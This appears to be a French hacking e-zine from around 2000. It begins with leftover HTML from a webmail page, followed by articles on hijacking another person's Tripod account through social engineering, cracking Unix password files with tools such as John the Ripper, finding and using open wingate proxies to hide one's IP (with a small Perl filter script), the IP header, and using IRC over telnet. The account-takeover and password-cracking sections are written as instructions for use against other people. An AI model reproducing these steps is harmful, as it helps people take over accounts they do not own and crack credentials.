<TR BGCOLOR="#000000"><TD ALIGN=center VALIGN=top COLSPAN=6 WIDTH=318>
<P> </P>
</TD>
<TD VALIGN=top WIDTH=152>
<P><A HREF="/Bin/CreationCompte2/FormulaireNomPrenom.asp"><IMG SRC="http://imgsrv.caramail.com/images/lien_creation.gif" WIDTH=144 HEIGHT=20 BORDER=0 ALIGN=bottom></A><BR>
<IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=10 HEIGHT=10 ALIGN=bottom></P>
</TD>
</TR>
<TR BGCOLOR="#000000">
<TD ALIGN=center VALIGN=top WIDTH=134 BGCOLOR="#000040">
<P><FONT SIZE="-2" FACE="Arial,Helvetica" COLOR="#FFFFFF">®Tous
droits réservés 2000</FONT></P>
</TD>
<TD VALIGN=top WIDTH=76>
<P> </P>
</TD>
<TD ALIGN=center VALIGN=top COLSPAN=5 WIDTH=242>
<P><FONT SIZE="-2" FACE="Arial,Helvetica" COLOR="#FFFFFF">Dialogue
en direct : <B>8605</B> connectés<BR>
CaraPlazza : <B>2493</B> articles en vente</FONT></P>
</TD>
<TD ALIGN=center VALIGN=top WIDTH=152>
<P> </P>
</TD>
</TR>
<TR BGCOLOR="#FFF0C0">
<TD ALIGN=center VALIGN=top WIDTH=134 BGCOLOR="#FFCC00">
<P><IMG SRC="http://imgsrv.caramail.com/images/spray_little.gif" WIDTH=132 HEIGHT=22 ALIGN=bottom></P>
</TD>
<TD VALIGN=top COLSPAN=7 WIDTH=470>
<CENTER><FONT SIZE="-2" FACE="Arial, Helvetica">Spray
Europe: </FONT><A HREF="http://www.spray.net" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Allemagne</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
</FONT><A HREF="http://www.spray.fr" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">France</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
</FONT><A HREF="http://www.spray.it" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Italie</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
</FONT><A HREF="http://www.spray.no" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Norvège</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
</FONT><A HREF="http://www.spray.se" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Suède</FONT></A><FONT SIZE="-2" FACE="Arial, Helvetica">
</FONT><A HREF="http://www.seznam.cz" TARGET="_blank"><FONT SIZE="-2" FACE="Arial, Helvetica">Rep.
Tchèque</FONT></A></CENTER>
</TD>
</TR>
<TR BGCOLOR="#FFFFFF">
<TD VALIGN=top COLSPAN=8 WIDTH=604>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=5 HEIGHT=5 ALIGN=bottom></P>
</TD>
</TR>
<TR BGCOLOR="#FFFFFF">
<TD ALIGN=center VALIGN=top COLSPAN=8 WIDTH=604>
<P><FONT SIZE="-2" FACE="Arial,Helvetica">Caramail respecte
la </FONT><A HREF="javascript:OpenWin();"><FONT SIZE="-2" FACE="Arial,Helvetica">loi
informatique et libertés de
1978</FONT></A><FONT SIZE="-2" FACE="Arial,Helvetica">.</FONT></P>
</TD>
</TR>
</TABLE>
<INPUT TYPE=hidden NAME=TZ VALUE=0></CENTER>
<P></FORM></P>
</BODY>
</HTML>
@+
By Scurt :)
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 4 *
* Hack des pages Tripod *
* *
* par N0s-k *
* *
*********************************************************************
1. Ce dont vous avez besoin
Pour hacker un compte Tripod vous n'avez pas besoin de grand chose. Vous devez avoir
accès a Internet (vous m'en direz tant...), vous devez aussi avoir l'adresse e-mail avec
laquelle il s'est enregistré sur Tripod (cherchez un peu, c'est très très souvent sur le
site =)). Vous aurez aussi besoin de deux à trois semaines (c'est le temps d'attente...
c'est donc très variable, si ça se trouve en 48H c'est finish !!) Ensuite vous devez avoir
le nom d'utilisateur qui est très simple à trouver puisque si vous voulez hacké
www.tripod.com/~lame et bin le nom d'utilisateur est ? "lame", Bravo !!. Après vous aurez
besoin du vrai nom de la personne ou celui qu'il a donné en guise de vrai nom...)
L..., il y a deux choix, soit c'est sur la page, soit vous allez à cette URL:
http://www.tripod.com/planet/search.html et entrez tous les renseignements que vous
avez, ou, si vous avez pas de cul, envoyez lui un mail avec "votre page est superbe..
je veux tout savoir sur vous..votre nom ? Votre age ? Votre ville ?....."
n'importe quoi en fait... le but étant d'avoir toutes les infos !
Regardez si par hasard il n'a pas ICQ (les lames se décrive sur ICQ,c bien connu !).
Ils vous faut ces informations ! Essayez tout ce que vous voulez mais ayez les !!
2. C'est partit !
Je vous ai pas demandé' tout ça pour rien, c'était très important...la première étape sera
de prendre le contrôle de l'account en ayant le compte enregistré sous votre adresse e-mail.
Vous devez avoir une adresse e-mail sur un fournisseur gratuit qui ressemble à la
vraie... (pas hacker@caramail.com =)) Alors maintenant, utilisez votre nouvelle adresse
pour écrire un message a membership@tripod.com, c'est exactement ce que Tripod nous dit de
faire... Voila la partie du contrat qui nous le dit:
"If you need to change your e-mail, please contact us at membership@tripod.com with your
new e-mail adress. Please include your member name, old E-mail adress, and full name in
the message."
Donc faite exactement +a, dites que vous avez une nouvelle adresse E-mail, et que vous
voulez que tripod udapte ses données ! Ca prend environ une semaine pour qu'il réponde,
voila ce que vous devriez recevoir:
"Dear "User",
Thank you for informing us of your new E-Mail adress.
We have udapted your membership information:
Tripod member name: membername (lui il a pas changé)
New E-mail Adress: membernam@caramail.com
If you have a homepage with Tripod, you will need to go throught and udapte your page yo
se new e-mail adress..."
Si vous ne vous en rendez pas compte, vous contrôlez son compte ! Tout ce qu'il devrait
normalement recevoir va être envoyé à vous...Donc si vous voulez le password vous cliquez
sur "password lost" et vous allez recevoir dans votre E-mail le password....(vous pouvez
aussi écrire à lost@tripod.com, mais dans ce cas l... il faut mettre votre username dans
le sujet et ne rien mettre dans le message (sinon ça marche pas :))...Vous devriez avoir
une réponse la semaine d'après...(ou avant mais rien n'est moins sur...) Mais si vous le
fait directement sur le site vous le recevrez dans les 5 min.... :)
Et voilà... vous avez hacké votre page Perso Tripod....Bon hack !
N0s-K
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 5 *
* Les fichiers Password *
* *
* par N0s-k *
* *
*********************************************************************
Avant de vous exposer la "méthode" (c juste un logiciel, je ne m'y connais aucunement en Crytpage/decryptage)
pour décrypter ces fichiers, il faut savoir à quelle sorte de fichier Password on a à faire...
1. Les fichiers Encryptés et Shadowed
-------------------------------------
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
Voilà un exemple d'un fichier password 'parfait' dans le sens qu'il est crackable...c'est
le jackpot !!! en clair y a plus qu'a sortir le cracker et c'est ok !
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
C'est un autre exemple d'un fichier password, only a la seule petite différence qu'il est
'Shadowed'
Les fichiers Shadowed ne vous laisse pas voir les password encryptés...Bouhhhh ! Et
malheureusement votre cracker ne peut rien faire contre ça...donc vaux mieux changé de
technique....
Encore un autre exemple de fichiers Shadowed....(il a l'air vrai, n'est ce pas ?)
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Les fichier password "shadowed" ont un "x" a la place du password et quelquefois il y aussi a
la place un "*"
2. Cracker le fichier Password Encryptés
----------------------------------------
Maintenant que vous en savez un petit peu plus sur quoi ressemble les fichiers "password"
actuellement vous devriez être capable d'identifier un fichier encrypté normal d'un
fichier password Shadowed. Maintenant on va parler d'une façon très simple de les crackers.
Cracker un fichier 'password n'est pas aussi compliqué que ça en a l'air, aussi le fichier
vari de système a système.
1. Déjà vous devez downloader le fichier sur votre disque dur =)
2. La seconde étape est de trouver un cracker de password ainsi qu'un dictionnaire de mots.
je vous recommande que vous cherchiez Cracker Jack, John The Ripper, Brute Force Cracker
ou bien encore Jack the Ripper.
Maintenant il vous faut un dictionnaire de mots...Vous pouvez en trouvez sur les pages de Hackers.
En fait qu'est ce qu'un dictionnaire de Mots ?
C'est tout simplement un fichier contenant toutes les combinaisons de mot/lettres/chiffres
réalisable avec un certain nombre de lettre ou de nombre (Vous imaginez bien que ça fait
plus de 10.000 mots souvent !).
3. Après vous le lancer votre cracker et après vous attendez en moyenne 2-3 Jours (sauf si
il tombe dessus dès le début =)) C'est long mais avouez que l'on ne le regrette pas =))
Conclusion:
-----------
Cracker un fichier password n'est pas plus compliquer que de lancer un programme... à
condition de trouver un fichier password valide ce qui avouons le est de plus en plus
difficile....
NOs-K
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
////////////////////////////////////////////
// 6 //////////////////////////////////////
/////////////Wingate: (Le NB how-to)//////
/////////////////////////////////////////
/////////////////////////////par sKoop//
Intro:
Les wingates sont très souvent utilisées dans les petits réseaux informatiques,
la plupart ne sont pas securisé et mal configuré. Je vais donc vous expliquer
comment trouver des wingates, et comment vous en servir.
1) Trouver des Wingates:
Il y a plusieurs manières de trouver des wingates, la première, vous êtes un lamer
et vous allez les chercher sur Internet. http://www.cyberarmy.com/lists/wingate/
La deuxième solution, vous êtes comme moi un newbie et je vais vous expliquer.
La troisième, vous vous y connaissez pas mal et vous pouvez d'ores et deja passer
à l'article suivant car vous avez vos propres techniques.
La technique de recherche de wingates sous irc:
Vous vous connectez comme d'habitude à votre serveur undernet préféré et vous
tapez stats g . La, une liste de données d'ips s'affiche à l'écran, ce sont celles
qui se sont fait bannir par le serveur. Dans cette liste, il y en a qui se sont
fait banner car leurs proxy ou leurs wingate était mal configuré. J'ai ecrit un
petit programme en Perl pour trier ces données, ce n'est qu'une version beta,
je n'ai pas le temps d'en ecrire une meilleure car :
1- Je suis newbie en programmation Perl.
2- Le magazine doit sortir demain.
Vous pouvez bien evidemment modifier le peu de code source qu'il y a, à condition
que vous gardiez le même nom pour l'application et que vous mettiez votre nom
ainsi que mon nom et les modifications que vous y avez apportées.
#!/usr/local/bin/perl
print " stats2wgates v 1.0b1 \n par sKoop : sKoop\@programmer.net \n\n" ;
open (WG, "irc_stats.txt") or die "Impossible d'ouvrir irc_stats.txt : $!\n";
while(<WG>) {
if (grep /wingate/ , $_) {
$ligne = $_ ;
print "$ligne" ;
$gate_trouve = "vrai"
}
}
close (WG) ;
if (!$gate_trouve) {
print "Aucune Wingate n'a Ète trouvÈ dans vos stats irc :(" ;
}
Donc, vous enregistrez la liste de données que vous venez de voir apparaitre a
l'écran dans un fichier que vous nommerez irc_stats.txt et qui se trouvera dans
le même repertoire que mon programme nommé stats2wgates.pl
Vous lancez le programme avec la commande:
> perl stats2wingate.pl
Une liste devrait apparaitre de cette forme:
< states2wgates v 1.0b1
< par sKoop : sKoop@programmer.net
<**@3ff81a3b.dsl.flashcom.net 1/09/00 11:26:40 :Banned *@3ff81a3b.dsl.flashcom.net[1] until Fri
Sep 01 08:26:51AM 2000 GMT [967796811]: Misconfigured proxy/wingate - may be attempting to
clone/spam/flood
< ...
L'adresse ip du wingate possible serait 3ff81a3b.dsl.flashcom.net
A vous maintenant de les tester...
2) Connection a une wingate:
Pour vous connecter a une wingate, vous aurez besoin d'un client telnet.
Rentrez la commande:
> telnet 3ff81a3b.dsl.flashcom.net 23
// Si c'est une wingate, alors vous verrez apparaitre une reponse vous
// demandant un host:port
< TelNet Gateway Ready
< Enter destination (host_name:port):
// Libre a vous de vous connectez sur n'importe quel serveur en passant par // telnet,
// Vous n'avez juste qu'a rentrer le nom du serveur desirer suivi du port
> Enter destination (host_name:port):lamer_server:123
Voila, le serveur ne verra que l'ip de la wingate, toutes les commandes etant
passées par elle et redirigées vers le serveur...
Pour passer les commandes, vous devez cependant faire un quote
/quote votre_commande
Conclusion:
Cet article a été ecrit en moins de 10 minutes, une prochaine version de mon programme
en Perl sera dispo sur www.bsc.fr.st section membre sur ma page. Si j'ai dit une
betise ou fait une erreur ou si vous desirez me poser une question, alors faites le à:
sKoop@programmer.net
Bon wingating...
Skoop
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 7 *
* le Protocole IP *
* *
* par N0s-k *
* *
*********************************************************************
1. Intro
Une interconnection de réseaux TCP/IP assure trois types de services,
s'appuyant l'un sur l'autre :
--------------------------
| service d'applications |
------------------------------------------------------
| Service de Transport Fiable |
---------------------------------------------------------------------
| Service de remise de paquet en mode non connectés |
---------------------------------------------------------------------
Au niveau le plus bas, un service de remise en mode non connecté assure la
base du transport sur lequel s'appuie tous les autres services.
Au niveau immediatement superieur, un service de transport fiable constitue
un moyen pour transmettre leurs informations aux services de niveaux
superieur, les applications.
2. Mode Non connecté : le protocole IP.
Ce service constitue un système de remise de paquets, non fiable, agissant
"Pour le mieux" ;p et sans connection. Il est considéré comme non fiable car
la remise n'est pas garantie. En pratique, la remise n'aura pas lieu seulement
si le réseau est saturé ou en panne. Malgré tout, les erreurs sont tjs possibles
en particulier sur Internet, on ne pourra pas envoyer de fichier avec ce protocole
a moins d'etre très chanceux ;)
Les paquets peuvent être perdus ou altérés, independament de tous les autres.
Le Protocole de remise non fiable en mode non connecté est appéle IP (Internet
Protocol). Il est décrit dans le RFC n° 791 et definit trois normes importantes :
- Unités de données transférées dans les interconnexions IP.
Décrit la strucutre de toutes les données qui transitent sur une interconnection
TCP/IP.
- Fonction de Routage.
Il s'agit là du choix du chemin d'acheminement.
- Un ensemble de règles concrétisant la concept de remise de paquets non fiable,
traitement des erreurs, conditions de destructions de paquets...
A. Structure des datagrammes IP
-------------------------------
Tout comme une trame physique possède une structure, un datagramme IP contient
deux parties : l'en-tete et la partie donnée.
|----------------------------------------------------------|
|0 4 8 16 31 |
|----------------------------------------------------------|
| Ver- | LGMAT | Type | Longueure Totale |
| Sion | | service | |
------------------------------------------------------------
| Identification | DRAP | Depl. |
| | | Fragment |
|----------------------------------------------------------|
| Durée | Protcoles | Total de Fragment |
| Vie | | en tete |
------------------------------------------------------------
| Adresse Ip source |
------------------------------------------------------------
| Adresse Ip Destination |
------------------------------------------------------------
| Option Ip éventuelles | Bour-|
| | rage |
------------------------------------------------------------
| Données... |
------------------------------------------------------------
Le Champ Version
-----------------
Codé sur 4 bits, il contient le Numéro de version du protocole IP utilisée pour créer
le datagramme. Il est utilisé pour s'assurer que tous les participants, émetteur,
récepteur et passerelles intermediaire, sont bien d'accord sur la structure du
datagramme. Si la norme évolue => IPV6, les machines rejettent les datagrammes dont
le numéro de version est différent du leur.
Le Champ LGMAT
--------------
Egalement codé sur 4 Bits, ce champ indique la longueur de l'en-tete en mots de 32 Bits.
Une en-tete courante, dépourvue de ces deux champs, a une longueur de 20 octets, soit la
valeur 5 dans le champs LGMAT.
Le Champ Longueure Total
------------------------
Il indique la longueur Total, exprimé en octet, du Datagramme IP, en-tete et données incluses.
La Taille du champ peut donc etre calculé en soustrayant "LGMAT" à "LGR TOTALE". La taille
maximum du datagramme est de 65535 octets, puisque le champs LGR TOTALE est codé sur 16 Bits.
Le Champ Type de service
------------------------
Codé sur 8 bits, il indique la manière dont le datagramme doit etre géré. Il est décomposé
de la manière suivante :
|------------------------------------------------|
| 0 1 2 | 3 | 4 | 5 | 6 7 |
|------------------------------------------------|
| Priorité | D | T | R | inutilisé|
|------------------------------------------------|
Le premier champ de 3 bits (priorité) définit la priorité du datagramme :
de 0 (priorité normale)
à 7 (supervision du réseau)
Les bits D, T, R, indiquent le type d'achemeniment souhaité :
--------------------------------------
| D | Délai Court |
--------------------------------------
| T | Débit elevé |
--------------------------------------
| R | Demande de grande fiabilité |
--------------------------------------
Fragmentation des Datagrammes
-----------------------------
Le problème est que chaque type de réseau physique autorise une certaine longueur de trame.
Ainsi,pour Ethernet, la longueur pourra être de 1500 octets, contre 2044 pour une trame
token Ring.
Pour des raisons de perfomormances, il n'est pas possible de réduire la taille des
datagrammes IP en fonction du plus petit denominateur commun des differentes trames
physiques existantes. Il faut donc procéder à un découpage du datagramme en fragments lors
du passage sur des réseaux ayant une MTU (Maximum Transport Unit) plus faible.
La taille de chaque fragment est choisie pour pouvoir être encapsulée dans une seule trame
de données.
Réassemblage des datagrammes
----------------------------
la question est de savoir s'il faut réassembler les datagrammes a la sortie du réseau a
Faible a MTU ou une fois arrivés a Destination
Dans le cas de TCp/IP, les fragments, les fragments sont rassemblés une fosi arrivés
a destination, ce qui entraine deux incoveniant :
- Perte d'efficacité au passage sue des réseaux ayant une MTU plus importante.
- Impossibilité de réassembler un datagramme en cas de perte de fragment.
En pratique, la machine destinataire arme un temporisateur de r"assemblage à la reception
du premier fragment. Passé le délais, si tous les fragments ne sont pas arrivé, elle procède
a la destruction de tous les elements sans traiter le datagramme.
Controle de la Fragmentation du Datagramme
------------------------------------------
- Le Champ Identification :
---------------------------
Il contient un entier unique identifiant le datagramme
- Le Champ Depl. Fragment :
---------------------------
Ce champ exprime en multiple de 8 octets l'offset de données par rapport au datagramme initial et
commence a 0
- Le champ DRAPEAU :
--------------------
Il est codé sur 3 bits. Les deux bites de poids faible de ce champ de ce champ servent a
controler la fragmentation. Le premier de ces deux bits ert a indiquer peut etre aplliqué
(0) ou non (1). Si une passerelle dont le bit DRAPEAU est positionné a 1 et qu'elle est
obligé de fragmenté le datagramme, elle le detruit et envoi un message d'erreur.
Le bit de poids faible est appelé "fragment a suivre". Il indique a la machien destinataire
s'il reste encore des fragments a suivre ;) En effet le champs "LGR TOTALE" indique la longueur
Totale du fragment et non pas du datagramme entier :)
Le champ durée de vie :
-----------------------
Indique en seconde la durée maximum de transit du Datagramme. En premier lieu, chaque passerelle
décrémente de 1 la durée de vie lorsqu'elle traite le datagramme. En outre, elle décrèmente
ce champ du nombre de secondes pendant lequel le datagramme a séjourné chez elle avant
d'etre servi. Lorsque le champ est arrivé a 0, le datagramme est détruit et un message
d'erreur est envoyé a l'emetteur.
Cela permet d'eviter les datagrammes bouclant indéfinimment en cas d'erreurs dans les
tables de routages...
Le Champ Protocole :
--------------------
Son rôle est analogue à son homologue pour la tram Ethernet. Il indique quel est le
protocol de haut niveau qui a été employé pour créer le message transporté.
Le Champ Total de controle :
----------------------------
Il assure l'integrité des données de l'en-tete. Celle-ci est considéré comme une suite
d'entiers Entiers de 16 bits, pour lesquels est effectué la somme arithmétique en
complement à un et pour resultats est pris le complement a un du resultat. Pour pouvoir
effectuer le calcul, ce champ est considéré contenir zero lors de l'addition.
Les Champs Adresses IP source et destination :
----------------------------------------------
Ils contiennent les adresses Ip sur 32 Bits de l'émetteur et du destinataire de la
trame. C quand meme pas compliqué ça ;)
Le champ Données :
------------------
Il indique le début le début de la zone de données du datagramme.
Le champ Option IP :
--------------------
Il est de longueur variable et n'est que pas obligatoire dans tous les datagrammes. Il
sert essentiellement à des fins de test ou de mise au point.
Il se decompose comme suit:
0 1 2 3 4 5 6 7
----------------------------------------------------
| Copie | Classe d'option | Numéro d'option |
----------------------------------------------------
-------------------------------------------------------------
Classe D'option | Signification |
-------------------------------------------------------------
0 | Datagramme ou supervision réseau |
-------------------------------------------------------------
1 | Reservé pour utilisation future |
-------------------------------------------------------------
2 | Mise au point
et mesures |
-------------------------------------------------------------
3 | Reservé pour une utilisation future |
-------------------------------------------------------------
------------------------------------------------------------------------------------------
| Classe d'| N° | Longueur | Signification |
| option |D'option | | |
------------------------------------------------------------------------------------------
| 0 | 0 | - | fin de la liste d'option. utilisé si les options ne se |
| | | | termine pas à la fin de l'entete. => champs de bourrage|
------------------------------------------------------------------------------------------
| 0 | 1 | - | Pas d'operation. Utilisé pour aligner les options dans |
| | | | une liste d'option |
------------------------------------------------------------------------------------------
| 0 | 2 | 11 | Restrictions de sécurité de sécurité et de gestion |
------------------------------------------------------------------------------------------
| 0 | 3 | var. |Routage lache, défini par la source. Utilisé pour router|
| | | |un datgramme suivant un chemin précis |
------------------------------------------------------------------------------------------
| 0 | 7 | variable | Enregistrement de route |
------------------------------------------------------------------------------------------
| 0 | 8 | 4 | Identificateur de connexion. Transporte un |
| | | | identificateur satnet (périmé) |
------------------------------------------------------------------------------------------
| 0 | 9 | Variable | Routage strict, défini par la source |
------------------------------------------------------------------------------------------
| 2 | 4 |Variable | Horodatage Internet |
------------------------------------------------------------------------------------------
Chaque option apparait l'une a la suite de l'autre.
L'option 'Enregistrement de route' est interessante car elle permet de constituer une
liste d'adresse vide, créee par la source et qui sera remplie au fur et a mesure du parcours
=> traçage ? ;)
L'option "Routage défini par la source" permet à celle-ci d'imposer un chemin. I peut s'agir
d'un routage strict (il y aura erreur si le chemin en kestion ne peut etre utilisé) ou
d'un routage lache (dans ce cas, il pourra y avoir transitpar un réseau intermédiaire
pour parcourir deux adresses de la liste)
L'option "HoroDatage Internet" permet d'enregistrer pour chaque passerelle franchie, des infos
sur la date.
Le Champ Bourrage :
-------------------
Il dépend des options choisies et permet de garantir que l'en-tete du datagramme possède
effectivement une taille qui soit un multiple entier de 32 bits. Il contient des bits a
zero.
3. Conclusion
Valà, ct une petite explication du protocole Ip, base du TCP/Ip. J'espère que ct pas
trop compliqué mais vu que le sujet l'est déjà un peu, ct difficile ;)
N0s-K
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
////////////////////////////////////////////
// 8 //////////////////////////////////////
///////////Telnet: IRC (Le NB how-to)/////
/////////////////////////////////////////
/////////////////////////////par sKoop//
Intro:
Vous allez me dire pourquoi ne pas passez directement par le fameux Mirc ou
bien Ircle ou bien envore Xchat? Et bien c'est simple, tous d'abord pour
apprendre le protocole d'Irc, qui est assez interessant et puis enfin pour
pouvoir se connecter au serveurs irc meme sur les plus anciennes machines qui
disposent (la plupart du temps) d'un logiciel telnet et qui n'ont pas la chance
de supporter un environnement graphique mais uniquement des lignes de commande.
I) Identification et connexion a un serveur:
Tout d'abord, vous devrez connaitre votre nom d'utilisateur (le même que celui
de votre e-mail), ensuite vous devrez connaitre l'adresse ip de votre machine
puis l'adresse du serveur auquel vous desirez vous connectez (voir liste au
chapitre 3), votre adresse e-mail, et vous devez choisir un surnom (nickname).
Dans l'exemple ci-dessous, mon nom d'utilisateur sera mrspok , mon adresse ip sera
123.456.789.0 , je desire me connecter a un serveur "Undernet" du nom de
caen.fr.eu.undernet.org , mon adresse email est mrspok@test.com et j'ai choisi
comme surnom telnet_user
!! Sachez que votre nom d'utilisateur doit être le même que le nom de votre adresse
e-mail (et en minuscules, le serveur fait une difference entre majuscules et minuscules).
Vous pourrez vous connecter avec un surnom qui lui pourra être de la forme que vous
desirez sauf si il est deja prit.
// J'ouvre une session telnet au serveur auquel je desire me connecter (en l'occurrence
celui de Universite de caen) le port de ce serveur qui gere irc est le port 6667.
telnet caen.fr.eu.undernet.org 6667
// Le serveur renvoi alors:
NOTICE AUTH :*** Looking up your hostname // il recherche votre nom de domaine
NOTICE AUTH :*** Checking Ident // il recherche votre adresse ip
NOTICE AUTH :*** Found your hostname // il trouve votre nom de domaine
NOTICE AUTH :*** No ident response // il ne trouve pas votre adresse ip, normal vous ne lui
avez pas specifié.
// Vous lui envoyer alors des informations afin qu'il vous autorise à vous connecter sur le
// serveur.
// ce sera de la forme
User nom_d_utilisateur \ident(votre.adresse.ip.actuelle)\ \serveur_irc\ :adresse@fournisseur.com
// en l'occurence
User mrspok \ident(123.456.789.0)\ \Caen.Fr.Eu.UnderNet.org\ :mrspok@test.com
// vous devez ensuite entrer votre surnom avec la commande nick
nick telnet_user
// Si tous c'est bien passé, le serveur va vous envoyez un ping, un ping
// demande à votre ordinateur
// si il est bien connecter et permet entre autre d'éviter le spoofing
// d'ip. Il sera de la forme
PING :suite_de_nombre.
// Les nombres changent a
// chaque connexion, pour chaque utilisateur.
// En l'occurence
PING :338555240
// Vous devez maintenant montrer au serveur que vous etes bien connecter et
// que c'est bien de votre ordinateur que vient la demande de connection au
// serveur, vous lui renvoyer alors par la commande PONG :suite_de_nombre
// la confirmation. Donc
PONG :338555240
// Si tout s'est bien passé, le serveur vous renvoi alors un message de ce
// type concernant les informations du serveur. Ce message change en
// fonction du serveur auquel vous vous connecter.
:Caen.Fr.Eu.UnderNet.org 001 telnet_user :Welcome to the Internet Relay Network sKoop
:Caen.Fr.Eu.UnderNet.org 002 telnet_user :Your host is Caen.Fr.Eu.UnderNet.org, runnin
g version u2.10.10.09
:Caen.Fr.Eu.UnderNet.org 003 telnet_user :This server was created Mon Jun 12 2000 at 0
9:35:12 CEST
:Caen.Fr.Eu.UnderNet.org 004 telnet_user Caen.Fr.Eu.UnderNet.org u2.10.10.09 dioswkg b
iklmnopstv
:Caen.Fr.Eu.UnderNet.org 005 sKoop SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNO
TICE MODES=6 MAXCHANNELS=10 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :a
re supported by this server
:Caen.Fr.Eu.UnderNet.org 251 telnet_user :There are 20828 users and 28355 invisible on
40 servers
:Caen.Fr.Eu.UnderNet.org 252 telnet_user 57 :operator(s) online
:Caen.Fr.Eu.UnderNet.org 253 telnet_user 13 :unknown connection(s)
:Caen.Fr.Eu.UnderNet.org 254 telnet_user 24706 :channels formed
:Caen.Fr.Eu.UnderNet.org 255 telnet_user :I have 1001 clients and 1 servers
:Caen.Fr.Eu.UnderNet.org NOTICE sKoop :Highest connection count: 1837 (1836 clie
nts)
:Caen.Fr.Eu.UnderNet.org 375 telnet_user :- Caen.Fr.Eu.UnderNet.org Message of the Day
-
:Caen.Fr.Eu.UnderNet.org 372 telnet_user :Type /MOTD to read the AUP before continuing
using this service.
:Caen.Fr.Eu.UnderNet.org 372 telnet_user :The message of the day was last changed: 12/
6/2000
:Caen.Fr.Eu.UnderNet.org 376 telnet_user :End of /MOTD command.
:Caen.Fr.Eu.UnderNet.org NOTICE telnet_user :on 1 ca 1(2) ft 10(10) tr
// Vous voila donc logger dans le reseau de caen.fr.eu.undernet.org , maintenant passons au commandes.
II) Les commandes irc: (non exhaustif)
Les commandes irc ne sont pas les memes que celles employées dans les logiciels, vous
n'avez pas a tape de / devant votre commande et vous n'avez pas non plus de boutons qui
automatisent les taches.
nick surnom
// Permet de changez votre surnom actuelle
join #Nom_de_la_channel
// Permet de se connecter a une channel sur le
// reseau.
who surnom_de_l_utilisateur_souhaite
// Permet d'avoie des informations sur
// l'utilisateur (channels auquel il est connectÈ, nom de host)
whois surnom_de_l_utilisateur_souhaite
// Permet d'avoir un peu plus
// d'infos sur l'utilisateur que la commande who entre autre le serveur par
// lequel il est connecter au reseau irc.
whowas surnom_de_l_utilisateur_souhaite
// Permet d'avoir des informations
// sur surnom_de_l_utilisateur_souhaite qui n'est plus dans la channel.
MSGPRIV surnom ou #nom_de_la_channel : Message
// Permet d'ecrire a un
// utilisateur en privÈ ou d'ecrire sur une channel
D'abord, les commandes qui s'appliquent aux utilisateurs:
Ping surnom_de_l_utilisateur_souhaite
// Permet d'envoyer un ping à
// l'utilisateur souhaité pour connaitre sont temps de réponse. (Si on
// vous envoit un ping, envoyez un pong, ce n'aura rien à voir avec le
// temps de connexion mais avec le temps que vous mettrez à renvoyer le
// pong ;)
mode #nom_de_la_channel +commande +surnom_de_l_utilisateur_souhaite
//Il existe differents type de commandes, ces commandes permettent en general
// de modifié les droits et privileges des utilisateurs connecté a une
// channel. il faut generalement etre op sur cette channel pour pouvoir
// effectuer ces commandes.
La commande o
// Si vous rentrez la commande +o alors l'utilisateur
// deviendra op sur la channel defini. Il aura tous les privilege. Si a
